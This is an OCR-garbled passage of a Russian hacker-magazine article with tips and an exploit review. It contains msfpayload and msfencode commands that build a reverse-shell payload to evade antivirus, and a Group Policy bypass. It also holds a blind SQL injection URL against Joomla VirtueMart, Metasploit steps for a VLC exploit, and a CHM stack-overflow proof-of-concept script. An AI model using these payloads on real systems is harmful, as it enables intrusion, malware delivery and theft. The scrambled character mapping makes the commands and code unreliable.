уже установленного соединения. Тогда фай еру достаточно трудно 
выделить нелегитимный трафик. 

Таким образом мы можем получить применяемую в сетке адре- 



сацию, ІР-адреса фаеров, ІЧАТ’ов и другого сетевого оборудо- 
вания. 

Способ этот реализован в виде входящей в поставку ВаскТгаск4 
тулзы Оігасе ( Ісатіиксогесіитр.сх ) от Михала Залевски. Доработ- 
ка этой идеи реализована в іпігасе ( сосіе.доодіе.сопп/р/іпігасе ) 
Робертом Свики. 

Итак: 



1) Создаем подключение 
псаі: -б ѵіс1:іт_пе1: . сот 21 

2) Трэйсим по данному соединению 
01:гасе еѣбѲ ѵіс1:іт_пе1: . сот 21 

Где: 

• -б ѵіс!;іт_пе1: . сот — наша цель; 

• 21 — порт, с которым устанавливаем соединение (протокол/порт 
— любой открытый); 

• е'ЫіѲ — сетевой интерфейс. 

Причем не важно, кто установил соединение. Трасеровать можно 
и по уже установленному соединению, где инициатор — удален- 
ный хост. 

И еще мини-совет в тему пользы простейших тулз. Самый про- 
стой, ноточный фингерпринт операционной системы — пингэтой 
ОС. Если ответы приходят со значением ТТІ_ близким (меньшим) 
к 1 28 — значит, ОС почти 1 00% ѴѴіпсІоѵѵз; 64-255 — значит, *піх. 
Этого вполне хватает для определения возможных векторов атак. 



№4 



ЗАДАЧА: ОРГАНИЗОВАТЬ ОСНОВУ ДЛЯ 
ѴѴЕВ-АТАК. 



Угадай страну-производителя по названию? :) 

1 



БцБссіп 



□ Л 



1 Тці 1 ІІСКСТР 






'■ ■ , 


■ ■ 


1 кри Гліял 


г.аа 


ІЬ ШЪ 


РРгртН 


\ 




РЕШЕНИЕ: 

Сейчас мы еще раз поговорим про инструментарий. 

Какой бы специализированный софтмы не использовали для взлома, 
такая прекрасная вещь как Рігебох является одной из основ. Хакерских 
плагинов кнему полным полно. Даже слишком много, да еще настро- 
ить все надо... В общем, я клоню 
ктому, что логичнее юзать уже 
подготовленный «хакерский» 
ЕР, чем начинать с пустого ме- 
ста. Ну или, как минимум, можно 
почерпнуть какие-то фичи. 
Классикой здесь, навер- 
ное, являются продукты 
отУЕНС — НаскегЕігебэх, 
Шітаіе Наскегбэх Асісіопз и 
СгеазеМопкеу ѴѴеЬ Зесигііу 
Тооікіі [ уебд.пеі/[аЬ/#{ооІ.5 ). Но, 
к сожалению, поддерживаться 
они перестали. 

Взгляни, на одну из возможных 
замен — Мапіга [ деітапіха. 
сот/сІоѵѵпІоасІ/іпсІех.ЫппІ ). 

Все основные плагины, общие 
настройки, портабельность. 
Остальное — лучше своими 
ручками потрогать. 
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ЗАДАЧА: ОБХОД АНТИВИРУСОВ. 



РЕШЕНИЕ: 

Возвращаемся к излюбленному :] 

На сей раз это что-то конкретно хорошее, так как на моментнаписания 
статьи все антивирусы были в пролете. Но начнем с прошлых постов 
по этойтеме. Какты помнишь, используя хитрые и не оченьтехни- 
ки, мы старались обойти антивирусы и скрыть рауіоасі из Меіазріоіі 
Ргатеѵѵогк — теіегргеіег. Антивирусные компании, видя общиетен- 
денции, связанные с М5Е, добавили сигнатуры теіегргеіег’а в свои 
базы. И он стал по-настоящему палиться. Радовалото, что компании 
таки не удосужились перенять опыт создателей апіітеіег и детектить 
теіегргеіег’а в памяти. Кстати, с а піітеіег связана забавнаятема. 
Некий человек написал розі-ехріоііаііоп скрипт для теіегргеіег’а, 
который не дает себя обнаружить. Каким образом ему это удается? 
Очень просто — он мигрирует на процесс апіітеіег, а тот проверяет все 
процессы, кроме себя самого. Класс! :) Но вернемся кобходуанти- 
вирей. Затулзу и за метод нам стоит поблагодарить Бернардо Дамеле. 
Итак, что же он сотворил? А вот что — «запускалыщик шелл-кодов». 
Звучит не научно, но правдиво. Тулзу збеіісосіеехес можно скачать тут: 
ЬіІрзУ/дііЬиЬ.сот/іпдиізЬ/зЬеЦсосІеехес . По сути своей идея проста как 
с горы на лыжах — сначало страшно, а потом как по маслу. Итак, на компе 
ужертвы запускается ехе’шник, который читаетспециальным образом 
«зашифрованные» данные, пихаетих ксебе в память и исполняет. 
Атеперь по шагам. 

1 . збеіісосіеехес читает входные данные; 

2. входныеданные — любой шелл-код в буквенно-циферном виде; 

3. данный шелл-код копируется процессом себеже в память; 

4 . для этой области памяти (страницы памяти) установлены флаги РѴѴХ, 
то есть информацию можно считывать, записывать и код в данной об- 
ласти МОЖНО ИСПОЛНЯТЬ; 

5 . создается новый тред (поток) и шелл-коду передается управление. 
Обход антивирусов организуется за счеттого, что у них отсутствуют 
сигнатуры нагрузок в таком виде. Объяснение всейтемы отБернаро 
Дамеле: ЬегпагбобатеІе.ЫодзроІ.сопп/201 1/04/ехесиІе-теІазрІоіІ- 
раѵІоасІз-Ьѵраззіпд.ЫтІ . На практике будет вы глядеть так: 

1. Конвертируем любую нагрузку в буквенно-циферный вид с 
размещением адреса на шелл-код в регистре ЕАХ., а итог 
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Все готово к запуску шеллкода 



сохраняем в файл : 

тзТрауІоасІ ыіпсІоы5/те1:епрпе1:еп/пеѵеп5е_1:ср ЕХІТРІІІ\ІС=1:ІігеасІ 
1_Р(ЖТ=4444 ЫН05Т=Ііаскег_ір К | твТепсосІе -а х86 -е х86/ 
а1рІіа_тіхесІ -1: гам Ви-р-РегКе§І5І:ег=ЕАХ > рауіоасі .Іхі: 

2. Запускаем сервер теііегргеіег-’ а на ожидание подключения: 

тз-РсІі тиііі/ііапсііег РАУЮА0=ыіпсІоы5/те1:епрге1:еп/ 
геѵегве_1:ср ЕХІТРІЛМС=1:ІігеасІ І_Р0КТ=4444 І_Н05Т= баскег_ір Е 



3. Передаем наш шелл -код тулзе 



Туре рауіоасі .1:х1: > вііеіісосіеехес . ехе 

4. Ждем бек-коннекта на сервере... 

Теперьо плюсах и минусах. Минуса здесь какминимум два. Во-первых, 
для запуска шелл-кода требуется запуск збеіісосіеехес, что далеко не 
всегда возможно. Во-вторых, хотя антивирусы и в обломе из-за отсут- 
ствия сигнатур (что со временем, конечно, изменится), но некоторые 
антивирусы, по слухам, все же детектят. Как? Эвристика срабатывает 
из-за использования РѴѴХ-страниц. Вообще, знающие люди говорят, 
что даннаятехника была известна давно, и потому широкого резо- 
нанса не вызвала. Но для нас главное, что она юзабельна. К плюсам 
можно отнести уже указанный обход антивирей, отсутствие привязки к 
шелл-коду и, что самоеудивительное, отсутствие привязки кОС и кее 
разрядности. То есть, конечно, есть привязка. Но зЬеІІсосІеехес можно 
перекомпилить под любую платформу, и она будет работать. 



ЗАДАЧА: ОБОЙТИ ОГРАНИЧЕНИЯ 
ГРУППОВЫХ ПОЛИТИК ѴѴІЫРОѴѴ5 НА 
ЗАПУСК ПРИЛОЖЕНИЙ. 

РЕШЕНИЕ: 

Для начала немного теории. 

«Групповая политика (Ѳгоир Роіісіез) — это набор правил или настроек, 
в соответствии с которыми производится настройка рабочей среды 
ѴѴіпбоѵѵз... применяется к группе пользователей... Групповые политики 
создаются в домене ...». 

По сути, для обычных пользователей это просто некие дополнитель- 
ные ограничения на их возможности (кроме правовых ограничений). 
Кпримеру, доменный админ может за претить смену прокси-сервера в 
ІЕ конкретному пользователю, на конкретной машине. Как ни странно, 
групповые политики существуют и вне домена. Можешь поставить 
их на своем домашнем компе — запусти с:Ѵ/ѵіпбо\л/5\зу5Іет32\дресІіІ. 
тзс (зесроі.тзс) под админом и ограничь остальных юзеров. Кстати, 
групповыми политиками частенько пользуются вирусы, запрещая 
запуск«Диспетчера задач» и «Редактора реестра», например, чтобы 
себя обезопасить. 

Такчто следующий материал можно использовать и для вполне 




«благих» дел. Но сегодня мы поговорим про ограничения групповых 
политикна запускаемые приложения. Официальное название — 
Эоііѵѵаге Резігісііоп Роіісіез (5РР). В стандартном включенном состоя- 
нии обычному пользователю разрешается запуск приложений только 
из системных папок «ѴѴіпбоѵѵз» и «Ргодгат Рііез». Почему именно 
оттуда? Все просто: обычные пользователи имеютна нихтолько права 
Реаб и Ехесиіе, отсюда вывод — запустить что-то свое пользователь 
несможет, так какписать в данные папки не имеетправа. На практике 
же ограничения представляют из себя что-то более четкое, предо- 
ставляя доступ пользователям всего к нескольким программулинам. 
Причем стоит отметить, что ЭРРследитза ограниченным набором 
расширений, которые могут являться исполняемыми. По дефолту — 
целый пучок (см. рисунок). Нотеперь кделу. Какже обойти? Способов 
масса, каквсегда :). Но поговорим только обуниверсальных. Первый 
способ, о котором я сегодня расскажу, применим в той ситуации, когда 
у пользователя имеется физический доступ к компу, который находится 
в домене, а групповая политика нацелена на пользователя. То есть 
обычный персональный комп. В данной ситуации наипростейшим 
методом явлется следующая последовательность действий. 

1. Вынимаем патч -корд из компа. 
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Ограничения групповыми политиками 




> СІѴСІ 

Все описанные в 
рубрике программы 
ищи на нашем 0Ѵ0. 



2. Включаем комп. 

3. Логинимся под своей учеткой. 

4. Втыкаем патч-корд. 

Суть данного метода (как ты, возможно, уже догадался) заключа- 
ется в том, что доменные групповые политки подгружаются, когда 
пользователь логинится в системе. Но та к как связь с доменом 
отсутствует, то и политики подгрузиться не смогут, а потому и не 
применятся. 

В систему же мы зайти сможем, так как используется фича сасбесі 
ботаіп сгесІепІіаІБ (за счет кэша последних заходов в систему). Да- 
лее мы восстанавливаем связь, подключая комп к сети. В общем, 
почти элегантно и просто. 

Перейдем ко второму способу. Что делать, когда отсутствует физи- 
ческий доступ к компу? Самый распространенный пример в та кой 
ситуации — терминальный доступ ксерверу. Придумал выход и 
намутил к нему тулзу Марк Руссинович. Причем довольно давно, 
но до сих пор все работает: и под Ѵізіа, и под 7-й. В от та к — ломай, 
мучай какое-то ПО, производителя крупного... Глядишь, и купили 
тебя уже. Мотаем на ус :). 

Суть данного способа основывается на следующих постулатах. Во- 
первых, процесс-родитель, запущенный пользователем (ехріогег. 
ехе, например) перед порождением других процессов (читай — за- 
пуском приложений) проверяет«подходит ли данный процесс под 
ограничительные или разрешительные списки/правила 5РР». 

И если все хорошо, то процесс запускается. Иначе — злая таблич- 
ка. Во-вторых, любой пользователь имеет права на манипуляции 
(изменения) над своими собственными процессами. Последнее 
поясню на примере. Есть ехріогег.ехе («Проводник») лежащий в 
папке «ѴѴіпсІоѵѵз». У пользователя нет прав на запись/изменения, 
но есть права на исполнение (ехесиіе). Запустив ехріогег.ехе, 
пользователь получает на процесс права, дающие возможность его 
изменять. 

То есть пользователь, условно говоря, может подключиться к про- 
цессу дебаггером и поменять ход действий. В качестве примера 
запусти ОНуйбд под обычным пользователем, и она выведеттолько 
список «твоих» процессов, доступных на изменение. 

Таким образом, соединив данные постулаты вместе, мы получаем, 



что подконтрольный нам процесс принимает решение о том, можем 
ли мы что-то запустить. Как-то нелепо :). 

Остается только понять, как модифицировать поведение подкон- 
трольного нам процесса. Марк в качестве примера написал не- 
большую тулзу, обходящую 5РР, и, что приятно, приложил исходни- 
ки. Она работает следующим образом: 

1. Используя мини-ехе-’шник, запускается разрешенный процесс 
(родительский) . 

2. Используя технику сІП-инжекта, в данный процесс 
подгружается сІ11-ка. 

3. В данном процессе мы запускаем какую-то необходимую нам 
программулину (порождаем процесс). 

4. Родительский процесс пытается прочитать реестр о 
применяемых правилах ограничений. 

5. Наша сііі-’ка в родительском процессе перехватывает данный 
запрос и отвечает ошибкой., что такой ветки нет. 

6. Родительский процесс, видя ошибку, думает, что ограничения 
на запуск отсутствуют, и порождает процесс. 

Важно, что на порождаемый процесс обход ограничений тоже 
работает — плодись сколько хочешь. Полное описание способа 
здесь: доо.дІ/ВРЮі . Самутулзу (дрсІізаЫе.гір), к сожалению, люди из 
Місгозоіі’а запрятали куда-то, но, во-первых, в сети еще можно ее 
отыскать, во-вторых, она есть на диске, а в-третьих, есть и другие. 
Например, 6РСи18ог от Эрика Рахнера. Работает она аналогичным 
образом. Искать там же. Для галочки применение: 

СрсІІБаЫе.ехе с : \ыіпсІоы5\ехр1опеп.ехе 

Еще интересность — можно добавить библиотеки в НКІ_М\ 
50 ЕТѴѴАРЕ\Місгобо1і\ѴѴіп6о\л/ 5 ЫТ\СиггепіѴегБІоп\ѴѴіпбо\л/5\АррІпіІ_ 

О І_І_5, и тогда они автоматом будут подгружаться при запуске любого 
приложения. Но - требуются локальные админские права. 

Ну и напоследок разбиваем в пух и прах ограничения на запускаемые 
приложения групповыми политиками следующим образом. Заходим 
на доо.дІ/исгЬО . читаем, вкуриваем итеперьуж 1 00% обходим. Автор 
- Вадиме Подамс, спасибо ему за труд. НС 
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1 ЕХРЮІТ 
ПЕѴІЕѴѴ 


5 




1 ЕХРЮІТ5 
ПЕѴІЕѴѴ 


1 



ОБЗОР . 

эксплоита 





Разбираем 
свежие 
уязвимости 



ЕХРЮІТ5 

ПЕѴІЕѴѴ 



КРЮ 

ѴІЕѴѴ 



В очередном обзоре эксплойтов мы собрали для тебя самые инте- 
ресные экспонаты за последний месяц. Кроме того, в рубрике 
небольшое изменение: теперь к каждой уязвимости прилагается 
СѴ55 ѵ2 Вазе Зсоге - стандартная для индустрии информационной 
безопасности шкала оценки серьезности уязвимостей. 



5СИ ИНЪЕКЦИЯ в -ІОО/ѴИА! СОМ_ 
ѴІВТІІЕМАВТ 



СѴ55Ѵ2 



7.5 (АѴ : Ы/АС : Ь/Аи : Ы/С : Р/І : Р/А: Р] 

ЕШЭ 

И вновь СМ5 Ооотіа радует нас дырой в своем компоненте. На 
этот раз под раздачу попал популярный скрипт интернет-магазина 
Ѵігіиетагі. Исследователи Стивен Сили и Рокко Келви из компа- 
нии Зігаізес обнаружили возможность проведения слепой 5СН_- 
инъекции в этом компоненте. Успешное применение атаки позволя- 
ет получить доступ к информации в БД и может привести к полному 
контролю над веб-сервером. 



ЕХРЮІТ 



Обратимся к скрипту , сопп_ѵіг1;иеппаг1;/с[а55е5/р5_ппосIи[е.рбр , и рас- 
смотрим функцию деІ_сІіг(], которая занимает строчки 255-270: 

-Рипсііоп §е1:_сІіг($Ьа5епате) 

{ 

$сІа1:аЬ = рз_0В; 

$гези11:5 = аггау(); 

$Я = "5ЕІ_ЕСТ тосІи1е_репті5 РВОМ # {ѵт}_тосІи1е ыбеге 

тосІи1е_пате= ' " . $Ьазепате . " ' " ; 

$сІа1:аЬ->диегу($я); 

і-р ($сІа1:аЬ->пех1:_гесогсІ()) { 

$гези11:5[ ’регтз' ] = $(^аіаЬ->-р( ,, тосIи1е_ре^т5 ,, ); 
геіигп $гези11:5; 

} 

еІ5е { 

геіигг іаізе; 

} 

} 

Обрати внимание на строку, в которой формируется запрос. Перемен- 
ная $Ьазепате поступаеттуда без всякой фильтрации. Пользователь, 



в свою очередь, может влиять на ее содержание через СЕТ-параметр 
раде, что можно увидеть в скрипте 'согю_ѵігІиетагі/ѵігІиетаг1:_раг5ег. 
рбр', строки 189-210: 

і-Р( $орііоп == "соіт^ѵігіиетагі:" ) { 
і-р (етр1:у($ра§е) ) {// сіе-раиіі: ра§е 
і-Р (сІеРіпесІ( 1 _ѴМ_І5_ВАСКЕМ0 1 )) { 

$ра§е = "зіоге.іпсіех"; 

{ 

еізе { 

$ра§е = НОМЕ РАСЕ; 

} 

} 

// І-еі'з сбеск і-р іИе изег із аііоыесі іо ѵіем ібе ра§е 
// І-Р поі,, $ра§е із зеі іо ЕКК0К_РА6Е 

$ра§еРегтіз5ІопзОК = $рз_тосІи1е->сІіескМосІи1еРептІ55Іоп5( 
$ра§е ); 

В последней строке вызывается функция сбескМобиІеРегтізБІопзО 
из скрипта , сот_ѵіг1;иетаг1;/с^а55е5/р5_тосIи^е.рбр , с интересующим 
нас параметром раде. В ней и происходитвызовуязвимой деІ_сІіг(), 
рассмотренной выше: 

іипсііоп сІіескМосІиІеРептііззіопзС $са11есІРа§е ) { 

§1оЬа1 $ра§е і $ѴМ_ІАНСБ ^ $еггог_іуре., $ѵтІ_о§§ег, $регт; 

// "зііор. Ьгоызе" => тосіиіе: зМор „ ра§е: Ьгоызе 
$ту_ра§е= ехріосіе ( ' . Д $ра§е ); 
і-р( етріу( $ту_ра§е[1] )) { 
геіигп -Раізе; 

} 

$тосІи1епате = $ту_ра§е[0]; 

$ра§епате = $ту_ра§е[1]; 

$сііг_1І5і = $ібіз->§еі_гііг($тосІи1епате); 

Эксплуатация этой уязвимости осложняется двумя вещами: 

1. Не выдается ошибка, если запрос неправильный (инъекция сле- 
пая). 
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Правим скомпилированный сГіт-файл в Ьех-редакторе 



2. боотіа сама по себе фильтруетсимволы V и V в запросах, поэтому 
при эксплуатации мы можем использовать только '=' в процессе пере- 
бора символов. Это существенно повышает количество оказавшихся 
в логахзапросов к целевому серверу. 

Таккакпосодержаниюстраницы мы неможем понять, выполнился 
наш запрос или нет, то остается использовать технику временных за- 
держек при проведении инъекции. Например, если мы имеем дело с 
Му5С!І_5 версии, то при таком запросе последует задержка примерно 
в 30-60 секунд: 



Іі1:1:р://[1;аг§е1:]/[ра1:Іі]/іпсІех. рбр?ор1:іоп=сот_ѵіг1:иетаг1:& 
ра§е=-1 1 +ипіоп+5е1ес1:+і-р(5иЬ5І:гіп§(@@ѵег5Іоп : ,1 і 1)=5 л 
ЬепсІітагк( 30000000, Мй5 ( ' х ' ) ) , пиіі) - -+-РакетосІи1е . 

-Ракера^е 

В этом запросе используется классическая для техники вре- 
менных задержек функция ЬепсЬтагИсоипІ, ехрг), которая 
выполняет заданное количество раз (сои пі) функцию, указанную 
во втором аргументе (в данном случае вычисляется хеш Мйб от 
буковки У). Эта функция выполняется только в том случае, если 
выражение У иЬз1:гіп§((а)(Эѵег5Іоп., 1, 1) = 5 ' истинно. Неслож- 
но догадаться, что это выражение сравнивает первый символ 
переменной ВДѵегзіоп с 5. Если на сервере используется Му50І_ 
4-й ветки, то в этом можно убедиться, подставив 4 вместо 5. Если 
после этого сервер будеттупить целую минуту — значит, наши 
предположения верны. Эксплойт к этой баге доступен здесь: 
ехріоіі-бб.сот . его ІО — 1 71 32. 



Синтаксис: . /17132. ру [<параметры>] -1: [хостіпорт] -сі 
[ д и р е кто р и я_джу мл ы ] 

Пример использования: . /17132. ру -р ІосаІІіоБІ: : 8080 -1: 
192.168.1.7 -сі /меЬаррв/зоотІа/ 

В эксплойте предусмотрено использование прокси-сервера, за это 
отвечает параметр ’-р' , после которого следуетуказать реквизиты 
сервера в формате «хост:порт». 

По опыту использования могу сказать, что иногда в процессе его 
работы возникаютложные положительные срабатывания. Они 
могут происходить из-за перебоев в соединении с интернетом, 
прокси-сервером или связи с целевым веб-сервером. Так что если 
в версии БД или хеше админа появляются разные спецсимволы или 
недопустимые буквы, то это повод прогнать эксплойт еще раз. Кро- 
метого, процесс работы эксплойта весьма неспешный, в среднем 
на извлечение инфы уходитоколо часа, так что одной чашкой кофе, 
как предлагает автор эксплойта тг_те, тут не отделаешься. Для 





ЕХРЮІТЗ 




КЕѴІЕѴѴ 




Уязвимый блок кода под отладчиком 



лишний раз информацию о БД, а сразу приступить к хешу админа, 
нужно закомментировать строчки 1 63-176. 



ТАВОЕТ5 



боотіа! сот_ѵігІиетагІ <= ѵі .1 .7 



50ШТЮЫ 



Обнови сот_ѵіііиетаіі до версии 1 .1 .8 либо поставь патч под номе- 
ром 1 .1 ,7а. 




ИСПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В /ІС МЕДІА РІАѴЕР 



СѴ55Ѵ2 



9.3(АѴ:М/АС:М/Аи:М/С:С/І:С/А:С) 



іааш 

Уязвимость была найдена небезызвестным Рикардо Нарваха, авто- 
ром эпического руководства «Введение в крекинге нуля, используя 
ОИуОЬд», вѴІ_С Мебіа Ріауегпри обработке файловых форматов 
АМѴ и І\І8Ѵ. Она эксплуатируется удаленно и приводит к выполне- 
нию произвольного кода с привилегиямитекущего пользователя. 
Техника Оапдііпд Роіпіег, с помощью которой эксплуатируется бага, 
была описана в далеком 2007 году на конференции Віаск На! ІІ5А 
(ѵѵбііерарег доступна на ихсайте). Сама ошибка возникаетв библио- 
теке ІіЬбігесЪ<_рІидіп.бІ.І при обработке 0x41 -байта, если егозначение 
больше 90. Эту библиотеку использует Іпіегпеі Ехріогег при обработке 
видео формата АМѴ, поэтому для успешной эксплуатации достаточно 
зайти на специально сформированную страничку через бажный ІЕ. 



ЕХРЮІТ 



С 26 марта эксплойт доступен в Меіазріоіі Егатеѵѵогк по адресу 
ехр Іо іі/ѵѵі п сі оѵѵб/Ь гоѵѵзе г/ѵ1с_а т ѵ. Для его подготовки и запуска про- 
делываем стандартные шаги: 

# Запускаем консольку 
$ тз-РсопБОІе 

# Выбираем нужный эксплойт 

изе ехр1оі1:/ыіпбоы5/Ьпоы5ег/ѵ1с_атѵ 

# Определяем полезную нагрузку (в данном случае запуск 
исполняемого файла) 

зеі: РАУЮАй міпбомБ/ехес 

# Определяем исполняемый файл (калькулятор) 
зеі: СМй саіс.ехе 

# Определяем целевую конфигурацию (ІлІіпбоіл/5 ХР 5РЗ ІЕ6) 



экономии времени можно закомментировать ненужные циклы под- зеі: ТАКОЕТ 1 

бора в функции боВІіпбЭдІІщесІіопП. Например, чтобы не извлекать # Задаем функцию выхода (по умолчанию ргосезз - тут не работает) 
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Процесс сборки вредоносного сЬт-файла 

5еІ ЕХІТРІЖ 5еИ 
# Запускаем шайтан-машину! 
ехріоіі: 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



п 



ЕХРЮІТ5 

КЕѴІЕѴѴ 






ЕХРЮІТЗ 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



ИЯ 



Напоминаю, что доступные опции можно просмотреть командой зЬоѵѵ 
орііопз, полезные нагрузки — зЬоѵѵ рауіоасіз, а доступные целевые си- 
стемы — зЬоѵѵ Іа гдеіз. Также полезно пользоваться автодополнением, 
которое вызывается клавишей табуляции. После команды ехріоіі на 
локальной машине запустится веб-сервер и будет да на ссылка непри- 
метного вида, которую и нужно впарить жертве. 

ѴІ_С Месііа Ріауег <= 1.1.7. 

Крометого, для успешной отработки эксплоита из Меіазріоіі 
Ргатеѵѵогк у жертвы должна быть одна из следующих конфигураций: 

• ѴѴіпсІоѵѵз ХР 5РЗ + ІЕ6; 

• ѴѴі псіоѵѵз ХР 5РЗ + ІЕ7; 

• ѴѴіпсІоѵѵз Ѵізіа + ІЕ7. 



50ШТІ0Ы 



В конце марта стала доступна обновленная версия плеера 1 .1 .8, реко- 
мендуется установка данной или более поздней версии. 




ПЕРЕПОЛНЕНИЕ СТЕКА В 
МІСР050РТ НТМІ. НЕІЯ <= 6.1 



Потенциально уязвимые места, из которых вызывается 
функция ІтеттоѵесаІІ 



ЕХРЮІТ 



Библиотека іізз.сііі, подгружающаяся в адресное пространство про- 
цесса ЬЬ.ехе (собственно, это и есть Місгозоіі НТМІ_ Неір) во время 
открытия сЬт-файлов, подвержена ошибке переполнения стека. 
Ошибка происходит во время декомпрессии контента, в результате от- 
сутствия соответствующих проверок при копировании произвольного 
количества данных в буфер, располагающийся на стеке. 

Уязвимое место в иде выглядит следующим образом (ѴѴіпХРБРЗ): 



.1:ех1::6638В251 8В 87 28 01 00 00 тоѵ 

,*ех*:6638В257 03 45 0С асИ 

.*ех*:6638В25А 56 изб 



еах, [есІі+128Іі] 
еах, [еЬр+аг§_4] 
езі 



; кол-во байт, которое будем копировать 
.1:ех1::6638В25В 50 ризіп еах 

; исходный буфер (декомпрессированный) 

,*ех*:6638В25С РЕ 75 08 ризМ [еЬр+йзІ:] 

; буфер на стеке, куда будем копировать 
.1:ех1::6638В25Р Е8 0В СС РЕ РР саіі 1_теттоѵе_са11 

; теттоѵе (тетсру на семерке) < — Бііаск оѵегПоы 



СѴ$$Ѵ2 



7.2 ( АѴ: Б/АС : Б/Аи : N/0 : С/І :С/А: С) 

Для начала приведем выдержку из Википедии: «НТМБНеІр (Місгозоіі 
СоппргеззесІ НТМБ Неір, Місгозоіі Сот рі ІесІ НТМБ Неір, .СНМ) — про- 
приетарный формат файлов контекстной справки, разработанный 
корпорацией Місгозоіі и выпущенный в 1997 году в качестве замены 
формата ѴѴі п Неір. Содержит в себе набор НТМБ-страниц, можеттакже 
включать в себя содержание со ссылками на страницы, предметный 
указатель, а также базу для полнотекстового поиска по содержимому 
страниц. Все входящие в .СНМ файлы сжаты алгоритмом \_7Х. 

Для просмотра .СНМ-файлов используется стандартное средство, 
встроенное во все версии Місгозоіі ѴѴіпсІоѵѵз, начиная с ѴѴіпсІоѵѵз 
98, и ѴѴіпсІоѵѵз І\ІТ. Крометого, существует ряд сторонних программ- 
просмотровщиков, РВРеабеги другие. Для создания .СНМ-файлов 
можно использовать бесплатные инструменты Місгозоіі НТМІ_ Неір 
ѴѴогкзбор, Ніпл2СЬт, плагины для Тоіаі Соттапсіег’а, а также другие 
средства». 



Данные, которые копируются в этот стековый буфер, представляют 
собой один из декомпрессированных блоков, являющийся дампом 
части файлов, внедренных во входной сЬт-файл. 

Чтобы передать управление на уязвимую область кода, необходимо 
изменить несколько байтпослетэга «/#ѴѴІ N 00ѴѴ5» (первый байтуста- 
на вливаем в 0 — значение меньше, чем первоначальное, следующее 
за ним слово устанавливаем в количество байт для копирования). 
После выполнения уязвимого саіі’ а будет записано 0x3117 байт из 
пользовательского буфера по адресу 0хЬ9Ь58 в стек по адресу 0x71998, 
что, очевидно, и приведет к нехорошей ситуации. 

Следует обратить внимание на тот факт, что функция 1_теттоѵе_саІІ 
(являющаяся оберткой над теттоѵе или тетсру под ѵѵіп7) помимо 
вышеприведенного уязвимого места также используется и в других 
дислокациях библиотеки іізз.сііі, что должно определенным образом 
побуждать интересующихся к дальнейшим исследованиям... 

Алгоритм создания вредоносного сбт-файла до смешного прост: 

• установить НТМЫЧеІр ѴѴогкзЬор ; 

• запустить НТМЫЧеІр ѴѴогкзЬор, создать новый проекти выбрать имя 
проекта; 

• в мастере создания проекта отметить флажки «НТМІ Неір ІаЫе оі 
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РП/ІПМ 






э 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 







ЕХРЮІТЗ 








КЕѴІЕуі ^ 










ЕХРЮІТЗ 

РГѴІГШ 




нріоуіт 




о 





МП, 




АЛРІауег ІЛе 33064 собственной персоной 





Уязвимый вызов зігсру под отладчиком 

сопіепіз (.Ыіс)» и «НТМІ^ІІег (.Мт)»; 

• указать пути кІезІ.Ызс, а затем кІезІ.Ыпп; 

• жмакнуть на кнопку «АсІсІ/МосІі1 : у ѵѵіпсіоѵѵ сІеЛпіІіопз», вбить в поле 
имени какую-нибудь ересь и затем нажать на ОК; 

• скомпилировать сбіт-файл (Рііе -> Сотрііе) ; 

• открыть сгенерированный сбт-файл в любимом Ьех-редакторе; 

• найти текст/#ѴѴІМ00ѴѴ5; 

• следоватьдо места после байта созначением 0x01 , заменить по- 
следовательность 3-х «правильных» байт на последовательность 3-х 
«угодных» байт 0x00 0x16 0x76; 





ЕХРЮІТЗ 




КЕѴІЕѴѴ 




Классика жанра: «рор,рор,геі» по адресу в 
перезатертом 5ЕН-обработчике 



ЕХРЮІТ5 



• ргобЕ 

Содержимое ІезІ.Ызс: 



<НТМІ_хВ(ЮУхиі_хІ_ІхОВ:]ЕСТ 6уре="1:ех1:/5І1:етар ,, > 
<рагат пате="Мате" ѵа1ие="1:е5І: ,, > 

<рагат пате="1оса1" ѵа1ие="1:е5І:.ІтІ:т ,, > 

</ов:ЕСТх/иіх/вооух/тт> 

Содержимое Іезі.біпп: 



<НТМІ_> 

<В(ЮУ> 

<іт§ 5 гс= " рос . §і"Р" > 

</ВСЮУ> 

</нтмі_> 

В ходе проводимых экспериментов было замечено, что отладчики, 
работающие в 3-м кольце защиты, ведут себя возмутительнейшим 
образом. Неадекватность их поведения состоит в том, что под 
отладкой мы попадаем на переписанный в результате эксплуата- 
ции уязвимости ЕІРтолько в том случае, если этот новый ЕІР будет 
больше, чем 0x76666666. В противном случае необходимо догадаться 
до правильной 1 6-битной поправки (сіезбіпабіоп + 0x1 с8), а также 
определить количество байт, которое не будетзаписано через до- 
ступный стек. 

Вся основная соль, материализованная в виде адреса, по которому 
будет передаваться управление после переполнения, кроется в 
файле рос.діб Ниже приведен скрипт, позволяющий генерировать 



Общая схема исполнения шелл-кода 
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гпві > иве ехрі оі і/ші псЗошв/Ьгошвег/ѵІ с_атѵ 

тві ехрІоііС ) > веі РЯѴЮРЮ иіі псіошв/ехес 

РЯУЮЯО => иіпеіошБ/ехдс 

гтібі ехрІоііС ) > веі СНО саіс.ехе 

СИй => саіс.ехе 

т еі ехрІоііС ) > веі ТВР6ЕТ 1 

ТАР6ЕТ => 1 

тві ехрІоііС ) > веі ЕХІТГиЫС векі 

Екпгиис => зеН 

тві ехрі оі 1 С ) > ехріоіі 

Ехріоіі гиппіпд ав ЬаскдгоипсІ іоЬ, 
тві ехрІоііС ) > 

ІІвіпд ШІ_: Ніір: //0, 0. 0.0: 8080/Й0І1О9шР 
І_оса1 ІР: Ьіір : // 192. 168. 1,100 : 8080/ 00М09иіР 
Зегѵег віагіесі. 

Зепсііпд таіісіоив раде Іо 192.168.1.101:1131... 
Зепсііпд ігіддег іііе іо 192,168.1,101:1134 
Зепсііпд таіісіоив раде іо 192.163.1.101:1150,.. 

Ярпгііпп Ітіппрг ііір +п 1 92 . 1 63 . 1 . 1 Й 1 : 1 1 54 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



Процесс настройки параметров эксплойта и запуск 
веб-сервера в М5Р 



данный файл. В качестве полезной нагрузки выбрана классика 
жанра: запуск калькулятора. 

ігпрогі: зуз 

Ье§іп_оі_§і-р = "\х47\х49\х46\х38\х39\хб1\хО8\хѲ0\хО8" + 
"\х0Ѳ\хО5\хРР\хѲѲ" + "\х90" * 6 

# прыжок на полезную нагрузку 
пех1:5ЕНоѵепл/гі1:е = "\хеЬ\х06\х90\х90" 

# адрес, по которому будем продолжать исполнение; 

# для готового варианта надо указывать адрес 

# последовательности инструкций рор, рор, геі: 
5ЕНоѵегыгі1:е = "\х81\х81\х81\х81" 

